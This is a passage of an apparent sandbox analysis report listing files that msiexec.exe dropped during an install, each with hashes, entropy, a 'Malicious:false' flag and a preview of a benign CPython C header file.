                                                                                                                                SHA1:E9E12A31A662F427A4554ED30CE510DF637CA8F8
                                                                                                                                SHA-256:317183ADADDC4135F5E5F3D4E4D097EEF9128B12AAC9FB66C1D147B960235811
                                                                                                                                SHA-512:9913247ECB45999296205F682FF5A7E97214217F3197C18FC16D2A76EE997E0BD16CBA326021840BF1C236871DAC6DD63414350C872805AD9DE930C902296C2D
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_TYPEOBJECT_H..#define Py_INTERNAL_TYPEOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....../* runtime lifecycle */....extern PyStatus _PyTypes_InitState(PyInterpreterState *);..extern PyStatus _PyTypes_InitTypes(PyInterpreterState *);..extern void _PyTypes_FiniTypes(PyInterpreterState *);..extern void _PyTypes_Fini(PyInterpreterState *);....../* other API */....// Type attribute lookup cache: speed up attribute and method lookups,..// see _PyType_Lookup()...struct type_cache_entry {.. unsigned int version; // initialized from type->tp_version_tag.. PyObject *name; // reference to exactly a str or None.. PyObject *value; // borrowed reference or NULL..};....#define MCACHE_SIZE_EXP 12..#define MCACHE_STATS 0....struct type_cache {.. struct type_cache_entry hashtable[1 << MCACHE_SIZE_EXP];..#if MCACHE_STATS.. size_t hits;.. size_t misses;.. size_
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):932
                                                                                                                                Entropy (8bit):4.985736505636948
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:drLWxwUZaGJlHeay3SxY/LjmGAQdN5UDcx6gnvy:dfWxbaIlHel0QLjqQd4Wvy
                                                                                                                                MD5:01DFAC0284CA64E5C407C6CA6A62CBFD
                                                                                                                                SHA1:7C8D3A69BA108B0C495ECEA0D8724642820394D5
                                                                                                                                SHA-256:13FF6A5688E724B4B560EA4E3B3BD787F0EDBB8B0DDEB5028A77D5F094B25A77
                                                                                                                                SHA-512:2649018068B3D7B273C765021E807EA411D756A7D94AA8473ABC71AD574D1F660E3180390DF9CE264FADAA633FA705FF2F729C9BD524854F4C85D04E96190292
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* Unicode name database interface */..#ifndef Py_INTERNAL_UCNHASH_H..#define Py_INTERNAL_UCNHASH_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif..../* revised ucnhash CAPI interface (exported through a "wrapper") */....#define PyUnicodeData_CAPSULE_NAME "unicodedata._ucnhash_CAPI"....typedef struct {.... /* Get name for a given character code... Returns non-zero if success, zero if not... Does not set Python exceptions. */.. int (*getname)(Py_UCS4 code, char* buffer, int buflen,.. int with_alias_and_seq);.... /* Get character code for a given name... Same error handling as for getname(). */.. int (*getcode)(const char* name, int namelen, Py_UCS4* code,.. int with_named_seq);....} _PyUnicode_Name_CAPI;....#ifdef __cplusplus..}..#endif..#endif /* !Py_INTERNAL_UCNHASH_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1778
                                                                                                                                Entropy (8bit):5.061366925900694
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:gVLsxwUZaGUbrSVJOaJ6Va+Wyv/6KvQIWCX+ehtM6MoNGs3mxgbnY:gRsxba1i+WWTILK+y26pX3WyY
                                                                                                                                MD5:16FB08A7BAABBBD69272DCA3F33768AC
                                                                                                                                SHA1:5AF5E57FB156F9B16FADB863AECFA0B5FDBB8627
                                                                                                                                SHA-256:D3E4844FAB241FF54513F8E47EE1072994A0AF4E7D20F47EA3A3909A3BCF6B6E
                                                                                                                                SHA-512:BC37FCBA1BF2D84637560EB02D329173C78DC3121A734C61D4276BCE89FF3A5189E436B2C34EB99198437E9A7E8914989789AFA3185D0C783268D41D0172C624
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_UNICODEOBJECT_H..#define Py_INTERNAL_UNICODEOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....#include "pycore_fileutils.h" // _Py_error_handler....void _PyUnicode_ExactDealloc(PyObject *op);..../* runtime lifecycle */....extern void _PyUnicode_InitState(PyInterpreterState *);..extern PyStatus _PyUnicode_InitGlobalObjects(PyInterpreterState *);..extern PyStatus _PyUnicode_InitTypes(PyInterpreterState *);..extern void _PyUnicode_Fini(PyInterpreterState *);..extern void _PyUnicode_FiniTypes(PyInterpreterState *);..extern void _PyStaticUnicode_Dealloc(PyObject *);....extern PyTypeObject _PyUnicodeASCIIIter_Type;..../* other API */....struct _Py_unicode_runtime_ids {.. PyThread_type_lock lock;.. // next_index value must be preserved when Py_Initialize()/Py_Finalize().. // is called multiple times: see _PyUnicode_FromId() implementation... Py_ssize_t next_index;..};
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):701
                                                                                                                                Entropy (8bit):5.218240704458259
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:B6BLD4r3Z/HQUZaQGIWQIVvIsWKHoMxDPAAnAmAnTAonc:gBLwxwUZaGe7lITTnc
                                                                                                                                MD5:1C15E4F445EEAAFC6A72164A5E3F2C5A
                                                                                                                                SHA1:6CB57704D54013A949004112B09D9CFE608773AA
                                                                                                                                SHA-256:59C4FCC7B2A863A1A84FE4D4BEDD11EB0A048606B7D2AE726787EFE15FA10E4C
                                                                                                                                SHA-512:8610AA52E18E3F5F64EE19A021D0809743D169A3CA1022C08EB4C93B612CCD337F0AA57FA923E58701C14921D91B3B940BE9B7F9C2D9FD2BCE21815E4EF86D6F
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_UNIONOBJECT_H..#define Py_INTERNAL_UNIONOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....extern PyTypeObject _PyUnion_Type;..#define _PyUnion_Check(op) Py_IS_TYPE(op, &_PyUnion_Type)..extern PyObject *_Py_union_type_or(PyObject *, PyObject *);....#define _PyGenericAlias_Check(op) PyObject_TypeCheck(op, &Py_GenericAliasType)..extern PyObject *_Py_subs_parameters(PyObject *, PyObject *, PyObject *, PyObject *);..extern PyObject *_Py_make_parameters(PyObject *);..extern PyObject *_Py_union_args(PyObject *self);....#ifdef __cplusplus..}..#endif..#endif /* !Py_INTERNAL_UNIONOBJECT_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):769
                                                                                                                                Entropy (8bit):5.149372802457639
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:gTeLTLxwUZaGgagFQCNaa+3gFR/G/KQG8l6AV20mwBMLnT7:gaXxbaDHQOF+ARuy0l65dwar3
                                                                                                                                MD5:03AF1DAE207D281E7DF21E2F9DA9E093
                                                                                                                                SHA1:68BF4266FD56F12C9BDF8935CA5D9284E0E0C541
                                                                                                                                SHA-256:75293776D2B802A9ED353467D386DB8B0FE897F7E23BD64DE97EA951F2C84890
                                                                                                                                SHA-512:4073AE9C27559489E018301E38F5CED9FE4A67DB29D3A06E000E83F42FB46B83C7326C07A975EB25FEC80050BEFE7BB1B38D07D3D98F61E945576CED2E3E4758
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_WARNINGS_H..#define Py_INTERNAL_WARNINGS_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....struct _warnings_runtime_state {.. /* Both 'filters' and 'onceregistry' can be set in warnings.py;.. get_warnings_attr() will reset these variables accordingly. */.. PyObject *filters; /* List */.. PyObject *once_registry; /* Dict */.. PyObject *default_action; /* String */.. long filters_version;..};....extern int _PyWarnings_InitState(PyInterpreterState *interp);....PyAPI_FUNC(PyObject*) _PyWarnings_Init(void);....extern void _PyErr_WarnUnawaitedCoroutine(PyObject *coro);....#ifdef __cplusplus..}..#endif..#endif /* !Py_INTERNAL_WARNINGS_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):802
                                                                                                                                Entropy (8bit):5.3966021620614475
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:Br8hx7xaNSl8jXlqqC3lqqCJhdS8FoqCJIb24MlqqVrCJWEmDlc4gGq/3:FAaqgFGFyX9Nbt+FItm9q/3
                                                                                                                                MD5:4C2DC2673FF0C29A24E94E5CB5A84465
                                                                                                                                SHA1:BD699667DC136D77B5EFCF945D9CA1BFB4142C1A
                                                                                                                                SHA-256:16492246BF15A2D1FA3E53B2D3BB7D7651EF4CCAA46BB4089CAC8F3C84F6DF7F
                                                                                                                                SHA-512:04DF5C5EE1C5B8FD38515DD76CB85F25F2F1FE018E2053DF0E7BDA2B2214B3FDF4DC055097CF8815F0C98B8C6A42CC5FC5C95671F297CAE19B95A8F1AE1DDCD9
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTRCHECK_H..#define Py_INTRCHECK_H..#ifdef __cplusplus..extern "C" {..#endif....PyAPI_FUNC(int) PyOS_InterruptOccurred(void);..#ifdef HAVE_FORK..#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= 0x03070000..PyAPI_FUNC(void) PyOS_BeforeFork(void);..PyAPI_FUNC(void) PyOS_AfterFork_Parent(void);..PyAPI_FUNC(void) PyOS_AfterFork_Child(void);..#endif..#endif../* Deprecated, please use PyOS_AfterFork_Child() instead */..Py_DEPRECATED(3.7) PyAPI_FUNC(void) PyOS_AfterFork(void);....#ifndef Py_LIMITED_API..PyAPI_FUNC(int) _PyOS_IsMainThread(void);....#ifdef MS_WINDOWS../* windows.h is not included by Python.h so use void* instead of HANDLE */..PyAPI_FUNC(void*) _PyOS_SigintEvent(void);..#endif..#endif /* !Py_LIMITED_API */....#ifdef __cplusplus..}..#endif..#endif /* !Py_INTRCHECK_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):620
                                                                                                                                Entropy (8bit):5.235721101363287
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:B02Q07ORBMKmQjQ6z3grkBUMW1af7+AK704R1IOIk1yeWqD3rH0FpR1IOysW1yej:BNinMqQr3Qf7/GIFvnhIynRa
                                                                                                                                MD5:0EB532113D44A964499B5E79878FABB7
                                                                                                                                SHA1:085D3010A6FB93EF0E1396DF46EB4C8FB2BCEE50
                                                                                                                                SHA-256:C4230A5AD5EDF6C08CDF2766F1ABFDC14BD8A4C829F94EB9D0FC9E14EFCDF86E
                                                                                                                                SHA-512:32B67E49708CF213C43AD7652949DCEC83574E31A718551943ADF721737FAA0AC013407A0DAD04C0DDD386DDF391D2EE7097D44259C4A8B61BA4D9D2806E9E3A
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_ITEROBJECT_H..#define Py_ITEROBJECT_H../* Iterators (the basic kind, over a sequence) */..#ifdef __cplusplus..extern "C" {..#endif....PyAPI_DATA(PyTypeObject) PySeqIter_Type;..PyAPI_DATA(PyTypeObject) PyCallIter_Type;..#ifdef Py_BUILD_CORE..extern PyTypeObject _PyAnextAwaitable_Type;..#endif....#define PySeqIter_Check(op) Py_IS_TYPE(op, &PySeqIter_Type)....PyAPI_FUNC(PyObject *) PySeqIter_New(PyObject *);......#define PyCallIter_Check(op) Py_IS_TYPE(op, &PyCallIter_Type)....PyAPI_FUNC(PyObject *) PyCallIter_New(PyObject *, PyObject *);....#ifdef __cplusplus..}..#endif..#endif /* !Py_ITEROBJECT_H */....
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1832
                                                                                                                                Entropy (8bit):5.170968612462476
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:ARFljjGngRvjehuskSYXG3H2XkhudounNrO8ekNJoOoRMpdABJ:8ljCngRO5zCsJg7aAvoOoREdAz
                                                                                                                                MD5:7F87AE41568900B5887E48FA8C5222E1
                                                                                                                                SHA1:33B41B73EB019A1F1DB99C6A922CB1B66D838C12
                                                                                                                                SHA-256:92A99313B3BCBF03719A1C4CEFE419AE2E57F906F92B322EF005DD231E6C5578
                                                                                                                                SHA-512:65AB55A2E1417F7B3893EC252D3930FA1619422E53542C0176E31A1AAB684F4D835472F685CBB5EE2933BC484D6F38A85BDE8DB7E7AE3A2E9EE2FE9401F46AB1
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* List object interface.... Another generally useful object type is a list of object pointers... This is a mutable type: the list items can be changed, and items can be.. added or removed. Out-of-range indices or non-list objects are ignored..... WARNING: PyList_SetItem does not increment the new item's reference count,.. but does decrement the reference count of the item it replaces, if not nil... It does *decrement* the reference count if it is *not* inserted in the list... Similarly, PyList_GetItem does not increment the returned item's reference.. count...*/....#ifndef Py_LISTOBJECT_H..#define Py_LISTOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....PyAPI_DATA(PyTypeObject) PyList_Type;..PyAPI_DATA(PyTypeObject) PyListIter_Type;..PyAPI_DATA(PyTypeObject) PyListRevIter_Type;....#define PyList_Check(op) \.. PyType_FastSubclass(Py_TYPE(op), Py_TPFLAGS_LIST_SUBCLASS)..#define PyList_CheckExact(op) Py_IS_TYPE(op, &PyList_Type)....PyAPI_FUNC(PyObject *) PyList_New
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3363
                                                                                                                                Entropy (8bit):5.358430261914862
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:0L5K7aXzaZe1lgaQBXBZHli13y13b3C66YZXnuPC3aXNR8ZBNZBNi87l/g/E8tY:dzsoaOi1C177MKl/0ztY
                                                                                                                                MD5:B8FACA62E3FBDB713E01EB0EBD7FD078
                                                                                                                                SHA1:9DE99C736E7B8AF5572DC6A2C98EDC20419EF1C5
                                                                                                                                SHA-256:42351CF500DD69AF5809B2B6D0FB4A354309959D13956654F4D797CEB9F69D4A
                                                                                                                                SHA-512:084EC5618A0BF1DBF646013FAE354D64AB611CE63B4BA96796203D65E8D33664C4F13D32B9987B819D590DFDC326BB5DC3B2EB7557DD1C86D1BB97C2BFE2B4B7
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_LONGOBJECT_H..#define Py_LONGOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....../* Long (arbitrary precision) integer object interface */....PyAPI_DATA(PyTypeObject) PyLong_Type;....#define PyLong_Check(op) \.. PyType_FastSubclass(Py_TYPE(op), Py_TPFLAGS_LONG_SUBCLASS)..#define PyLong_CheckExact(op) Py_IS_TYPE(op, &PyLong_Type)....PyAPI_FUNC(PyObject *) PyLong_FromLong(long);..PyAPI_FUNC(PyObject *) PyLong_FromUnsignedLong(unsigned long);..PyAPI_FUNC(PyObject *) PyLong_FromSize_t(size_t);..PyAPI_FUNC(PyObject *) PyLong_FromSsize_t(Py_ssize_t);..PyAPI_FUNC(PyObject *) PyLong_FromDouble(double);..PyAPI_FUNC(long) PyLong_AsLong(PyObject *);..PyAPI_FUNC(long) PyLong_AsLongAndOverflow(PyObject *, int *);..PyAPI_FUNC(Py_ssize_t) PyLong_AsSsize_t(PyObject *);..PyAPI_FUNC(size_t) PyLong_AsSize_t(PyObject *);..PyAPI_FUNC(unsigned long) PyLong_AsUnsignedLong(PyObject *);..PyAPI_FUNC(unsigned long) PyLong_AsUnsignedLongMask(PyObject *);..PyAPI_FUNC(PyObject *) PyLong_GetInf
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):858
                                                                                                                                Entropy (8bit):5.263897187263659
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:whFwUUNXU87Lf4PWzUTxUxwRuU7ZUunaY9:fn0ndr
                                                                                                                                MD5:ECA3E448E6E8EBB96F4715D5BDE0504F
                                                                                                                                SHA1:472364097F1F8B010FBE4452AAA1E840157ED029
                                                                                                                                SHA-256:8F8D8B4453B83B023176FC156435330E25BCBF0B36E18106429824ABC69269D5
                                                                                                                                SHA-512:B2AAF724052B91AF54FBA2CEB0BF7570758623347A094FE4B4B7218A016CDBA9CEF6284732BAAE3CCF404EA85330F43EF1CED6F342B145EA0152F3695A309FEE
                                                                                                                                Malicious:false
                                                                                                                                Preview:../* Interface for marshal.c */....#ifndef Py_MARSHAL_H..#define Py_MARSHAL_H..#ifndef Py_LIMITED_API....#ifdef __cplusplus..extern "C" {..#endif....PyAPI_FUNC(PyObject *) PyMarshal_ReadObjectFromString(const char *,.. Py_ssize_t);..PyAPI_FUNC(PyObject *) PyMarshal_WriteObjectToString(PyObject *, int);....#define Py_MARSHAL_VERSION 4....PyAPI_FUNC(long) PyMarshal_ReadLongFromFile(FILE *);..PyAPI_FUNC(int) PyMarshal_ReadShortFromFile(FILE *);..PyAPI_FUNC(PyObject *) PyMarshal_ReadObjectFromFile(FILE *);..PyAPI_FUNC(PyObject *) PyMarshal_ReadLastObjectFromFile(FILE *);....PyAPI_FUNC(void) PyMarshal_WriteLongToFile(long, FILE *, int);..PyAPI_FUNC(void) PyMarshal_WriteObjectToFile(PyObject *, FILE *, int);....#ifdef __cplusplus..}..#endif....#endif /* Py_LIMITED_API */..#endif /* !Py_MARSHAL_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2882
                                                                                                                                Entropy (8bit):5.159265296619481
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:IfM192Nt9pF0ZKm4+ZmtrDAT/ALy+e360u+SZ0CZvEZCIDAvfx08mNAD7Y7cy2Ku:IfWZrrsFrzeqJbYCfJgNIYXZ0w3r89My
                                                                                                                                MD5:8746D654AC5DC5C4208FB13A2786A640
                                                                                                                                SHA1:5381787A5504658DE89EFE8DAAF1288F168FAE60
                                                                                                                                SHA-256:D55695413E6591ED3A27E1D8B3D1B30752626B39FAC334D407AE139F418CA205
                                                                                                                                SHA-512:A954B4B228F6DEDA712FF31278B87184E7C71861DB1ECEFB54DFB57F348E91876F726B2D4840F5AEF12EA1CBB7BE607E8DFF231D5FBC12D9E520252746063B88
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* Memory view object. In Python this is available as "memoryview". */....#ifndef Py_MEMORYOBJECT_H..#define Py_MEMORYOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_LIMITED_API..PyAPI_DATA(PyTypeObject) _PyManagedBuffer_Type;..#endif..PyAPI_DATA(PyTypeObject) PyMemoryView_Type;....#define PyMemoryView_Check(op) Py_IS_TYPE(op, &PyMemoryView_Type)....#ifndef Py_LIMITED_API../* Get a pointer to the memoryview's private copy of the exporter's buffer. */..#define PyMemoryView_GET_BUFFER(op) (&((PyMemoryViewObject *)(op))->view)../* Get a pointer to the exporting object (this may be NULL!). */..#define PyMemoryView_GET_BASE(op) (((PyMemoryViewObject *)(op))->view.obj)..#endif....PyAPI_FUNC(PyObject *) PyMemoryView_FromObject(PyObject *base);..#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= 0x03030000..PyAPI_FUNC(PyObject *) PyMemoryView_FromMemory(char *mem, Py_ssize_t size,.. int flags);..#endif..#if !defined(Py_LIMITED_API
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5204
                                                                                                                                Entropy (8bit):5.200069484106347
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:ERtYOT3Kv84gT2LkVl/xulMrIygK0KiqW:AYK3G9gT2k7FrIBqW
                                                                                                                                MD5:A23172D04FE84C464A2567FA02EB39A9
                                                                                                                                SHA1:3BA2417435B22AE03D8A94F5564754857B437938
                                                                                                                                SHA-256:16F4D74C9986215C0F4A79AFA241E126DE2F10ACAFD0E7067DC6D730639AA84E
                                                                                                                                SHA-512:87DA163447AF1CAB8818ED9892EB3C06C18E3A5645BA8ADC865A65E451E0AE2702BC9CABFC36306D7E7B5E4AE49EAAACA4C92FD134F75AB24E8F295BA36E10EF
                                                                                                                                Malicious:false
                                                                                                                                Preview:../* Method object interface */....#ifndef Py_METHODOBJECT_H..#define Py_METHODOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif..../* This is about the type 'builtin_function_or_method',.. not Python methods in user-defined classes. See classobject.h.. for the latter. */....PyAPI_DATA(PyTypeObject) PyCFunction_Type;....#define PyCFunction_CheckExact(op) Py_IS_TYPE(op, &PyCFunction_Type)..#define PyCFunction_Check(op) PyObject_TypeCheck(op, &PyCFunction_Type)....typedef PyObject *(*PyCFunction)(PyObject *, PyObject *);..typedef PyObject *(*_PyCFunctionFast) (PyObject *, PyObject *const *, Py_ssize_t);..typedef PyObject *(*PyCFunctionWithKeywords)(PyObject *, PyObject *,.. PyObject *);..typedef PyObject *(*_PyCFunctionFastWithKeywords) (PyObject *,.. PyObject *const *, Py_ssize_t,.. PyObject *);..typedef PyObject *(*PyCMethod)(PyObject *,
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6616
                                                                                                                                Entropy (8bit):5.26222955075195
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:mTuSvBJ1azzUzndMzzHsYjDBCOChIfzXIWidjCHMZ439HeWk2k8N4EFNoQA7uKQ:O0zcdMPHl8ofzqjCsC/kKQQ
                                                                                                                                MD5:280D53A429E08EB0F058C39299DB7F9B
                                                                                                                                SHA1:4226B42B2F45C76551534E9389A92867845E3DD3
                                                                                                                                SHA-256:E689442E355BC3C7D51F3AB23AE3500B68BEEC58442D10B977D401146FA20FA5
                                                                                                                                SHA-512:A4CCC5EC91BCE18593F5C2034E8E3D4748BC45A9A174837AF70F767970AA7C2FAB56FF1DA9F25F5F1433B44A2DA056289737F804E57ADB09CAF04D2E2C10B34B
                                                                                                                                Malicious:false
                                                                                                                                Preview:..#ifndef Py_MODSUPPORT_H..#define Py_MODSUPPORT_H..#ifdef __cplusplus..extern "C" {..#endif..../* Module support interface */....#include <stdarg.h> // va_list..../* If PY_SSIZE_T_CLEAN is defined, each functions treats #-specifier.. to mean Py_ssize_t */..#ifdef PY_SSIZE_T_CLEAN..#define PyArg_Parse _PyArg_Parse_SizeT..#define PyArg_ParseTuple _PyArg_ParseTuple_SizeT..#define PyArg_ParseTupleAndKeywords _PyArg_ParseTupleAndKeywords_SizeT..#define PyArg_VaParse _PyArg_VaParse_SizeT..#define PyArg_VaParseTupleAndKeywords _PyArg_VaParseTupleAndKeywords_SizeT..#define Py_BuildValue _Py_BuildValue_SizeT..#define Py_VaBuildValue _Py_VaBuildValue_SizeT..#endif..../* Due to a glitch in 3.2, the _SizeT versions weren't exported from the DLL. */..#if !defined(PY_SSIZE_T_CLEAN) || !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= 0x03030000..PyAPI_FUNC(int) PyArg_Parse(PyObject *, const ch
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2469
                                                                                                                                Entropy (8bit):5.344467935454051
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:j2JSl6vaFQsGID6kvkj7+j1ScHL2KrGAQvYICtGLxp2wxMCtDQd5xSMJ24eKbbRy:jZ5EH+hzLlGoJC3LedVm2mV
                                                                                                                                MD5:C57259DC0E50E734F724E1F1A597B80C
                                                                                                                                SHA1:D4583F21BAE03CF6661E97A0927F6DE52D3FB36C
                                                                                                                                SHA-256:F6CBA857DB9C3E394D2265D055AAA6791A5ABAECB48DF09693533B28275142AB
                                                                                                                                SHA-512:756BB4B318012E279BC05867010029AF6FC8905737DDFEE0847086347582915B2094AACF736EA7743A325347466BE11B7303D8045D9B1555D12D6F7B44F57B90
                                                                                                                                Malicious:false
                                                                                                                                Preview:../* Module object interface */....#ifndef Py_MODULEOBJECT_H..#define Py_MODULEOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....PyAPI_DATA(PyTypeObject) PyModule_Type;....#define PyModule_Check(op) PyObject_TypeCheck(op, &PyModule_Type)..#define PyModule_CheckExact(op) Py_IS_TYPE(op, &PyModule_Type)....#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= 0x03030000..PyAPI_FUNC(PyObject *) PyModule_NewObject(.. PyObject *name.. );..#endif..PyAPI_FUNC(PyObject *) PyModule_New(.. const char *name /* UTF-8 encoded string */.. );..PyAPI_FUNC(PyObject *) PyModule_GetDict(PyObject *);..#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= 0x03030000..PyAPI_FUNC(PyObject *) PyModule_GetNameObject(PyObject *);..#endif..PyAPI_FUNC(const char *) PyModule_GetName(PyObject *);..Py_DEPRECATED(3.2) PyAPI_FUNC(const char *) PyModule_GetFilename(PyObject *);..PyAPI_FUNC(PyObject *) PyModule_GetFilenameObject(PyObject *);..#ifndef Py_LIMITED_API..PyAPI_FUNC(void) _PyModule_Clear
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):30597
                                                                                                                                Entropy (8bit):5.2292973600083155
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:BA+hqkIs5lJFlnh4jFfiL+nzNFRxHMHUwzrDd:BAEtCjF64zdNOd
                                                                                                                                MD5:CA7BB21EA1171916D876C6BE06B77230
                                                                                                                                SHA1:44B4367D41A0658BFDDDBBA56B1955C5AE049804
                                                                                                                                SHA-256:2F7C2672D49F8CC09486EF9C14E38698E2CC70D6EBCCC957E5F8EBE262487401
                                                                                                                                SHA-512:05D0AF3152EF2440426F359F13CC41B76DADB47D4B58E0C80C79D3056FBCB15B7514B49BADE958982F09936349410D4760B9A078C43F3742DC694C623156E71E
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_OBJECT_H..#define Py_OBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....../* Object and type object interface */..../*..Objects are structures allocated on the heap. Special rules apply to..the use of objects to ensure they are properly garbage-collected...Objects are never allocated statically or on the stack; they must be..accessed through special macros and functions only. (Type objects are..exceptions to the first rule; the standard types are represented by..statically initialized type objects, although work on type/class unification..for Python 2.2 made it possible to have heap-allocated type objects too).....An object has a 'reference count' that is increased or decreased when a..pointer to the object is copied or deleted; when the reference count..reaches zero there are no references to the object left and it can be..removed from the heap.....An object has a 'type' that determines what it represents and what kind..of data it contains. An object's type is fixed w
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8643
                                                                                                                                Entropy (8bit):5.01738248873645
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:8Zcrdb8taWxOqxtFJ3R84GCkJmwT4bGr4HuvkvzImvKO/hFXGCDIQUJeNM2BQAaN:aaWxOqxw+kJlkOwvJTXDE6P7M1gw
                                                                                                                                MD5:2664852EAF62967F22131AA233C61BC2
                                                                                                                                SHA1:942BD91B2742C572929E72F18E95283BAC2DCA47
                                                                                                                                SHA-256:22DBC478EDD62C02035CFA9FC1F7BC45F9D6AC36077FD96529CCC3C8C047AE36
                                                                                                                                SHA-512:26BDEE99211185B12DFF7D6643C26A6CA754D1E7F643AF865B1E03D0BD7E2AF6FB589C265AC768905C7CA869C068C7E4D57FD0463A34395D1C899BFE267BB245
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* The PyObject_ memory family: high-level object memory interfaces... See pymem.h for the low-level PyMem_ family...*/....#ifndef Py_OBJIMPL_H..#define Py_OBJIMPL_H....#include "pymem.h"....#ifdef __cplusplus..extern "C" {..#endif..../* BEWARE:.... Each interface exports both functions and macros. Extension modules should.. use the functions, to ensure binary compatibility across Python versions... Because the Python implementation is free to change internal details, and.. the macros may (or may not) expose details for speed, if you do use the.. macros you must recompile your extensions with each Python release..... Never mix calls to PyObject_ memory functions with calls to the platform.. malloc/realloc/ calloc/free, or with calls to PyMem_...*/..../*..Functions and macros for modules that implement new object types..... - PyObject_New(type, typeobj) allocates memory for a new object of the given.. type, and initializes part of it. 'type' must be the C structure
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11423
                                                                                                                                Entropy (8bit):3.7766257037642434
                                                                                                                                Encrypted:false
